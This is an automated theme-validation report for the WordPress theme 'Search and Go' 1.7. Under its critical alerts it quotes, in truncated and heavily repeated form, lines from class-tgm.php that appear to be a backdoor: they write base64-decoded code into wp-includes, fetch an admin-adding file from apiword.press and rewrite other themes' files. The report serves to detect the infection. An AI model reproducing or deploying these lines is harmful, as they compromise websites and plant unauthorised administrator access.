10
Validation results

Search and Go

Search and Go

WordPress 4.9.1 theme
10
    Error 8 : Undefined index: slug
    In /home/www/themecheck/themecheck/controllers/controller_results.php line 772
  • THEME TYPEWordPress theme 4.9.1
  • FILE NAMEsearch-and-go.zip
  • FILE SIZE10130161 bytes
  • MD545344d51eb9d00deef5f28546b0c41ec
  • SHA14bfd223c7149427bef79d8b6d47fb3be41bff2e4
  • LICENSEGNU GPL 2
  • FILES INCLUDEDCSS, PHP, HTML, XML, Bitmap images, Adobe Illustrator
  • THEME URIhttp://searchandgo.elated-themes.com/
  • VERSION1.7
  • AUTHOR URI
  • CREATION DATE2017-05-17
  • LAST FILE UPDATE2017-05-17
  • LAST VALIDATION2017-05-17 10:19
  • OTHER VERSIONS

    1.8 : 48%

    1.1.1 : 50%

Critical alerts
  1. Security breaches : Use of base64_decode() Found base64_decode in file class-tgm.php.
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
    Line 89: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
  2. Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe src="http://www.youtube.com/embed/<?php echo esc_attr(get_post_meta(get_the_ID(), "eltd_post_video_id_meta", true)); ?> in file video.php.
    Line 3: <iframe  src='http://www.youtube.com/embed/<?php echo esc_attr(get_post_met
  3. Malware : Operations on file system file_get_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_put_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
  4. Included plugins : Zip file found Plugins are not allowed in themes. The zip file found was eltd-listing.zip eltd-instagram-feed.zip js_composer.zip eltd-booking.zip eltd-core.zip.
Warning
  1. core scripts deregistered : Core scripts deregistrationFound wp_deregister_script in functions.php. Themes must not deregister core scripts.
    Line 1173: wp_deregister_script('jquery');
  2. theme tags : Presence of bad theme tagsFound wrong tag in style.css header.
  3. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'search_and_go' in file shipping-calculator.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are search-and-go, search_and_go.
  4. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  5. Custom elements : Presence of custom backgroundNo reference to custom background was found in the theme.
  6. Editor style : Presence of editor styleNo reference to add_editor_style() was found in the theme. It is recommended that the theme implements editor styling, so as to make the editor content match the resulting post output in the theme, for a better user experience.
  7. I18N implementation : Proper use of ___all(Possible variable $cvalue found in translation function in shipping-calculator.php. Translation function calls should not contain PHP variables.
    Line 58: echo '<option value='' . esc_attr( $ckey ) . '' ' . selected( $current_r, $ckey, false ) . '>' . esc_html__( esc_html( $cvalue ), 'search_and_go' ) .'</option>';
  8. I18N implementation : Proper use of esc_html___all(Possible variable $cvalue found in translation function in shipping-calculator.php. Translation function calls should not contain PHP variables.
    Line 58: echo '<option value='' . esc_attr( $ckey ) . '' ' . selected( $current_r, $ckey, false ) . '>' . esc_html__( esc_html( $cvalue ), 'search_and_go' ) .'</option>';
  9. CSS files : Presence of text domainText Domain: is missing from your style.css header.
  10. Screenshot : Screenshot fileScreenshot size is 800x600px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  2. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  3. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  4. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  5. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  6. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  7. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  8. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  9. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  10. Use of includes : Use of include or requireThe theme appears to use include or require : social-login.php
    Line 453: include_once(ABSPATH.'wp-login.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : plugins-activation.php
    Line 2: require_once ('class-tgm.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-tgm.php
    Line 43: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-cd.php\')) include_once(dirname(__FILE__) . \'/wp-cd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes